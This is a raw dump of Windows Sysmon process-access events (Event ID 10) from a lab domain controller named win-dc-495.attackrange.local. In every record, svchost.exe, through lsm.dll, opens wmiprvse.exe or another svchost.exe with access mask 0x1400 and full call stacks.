13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.695{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
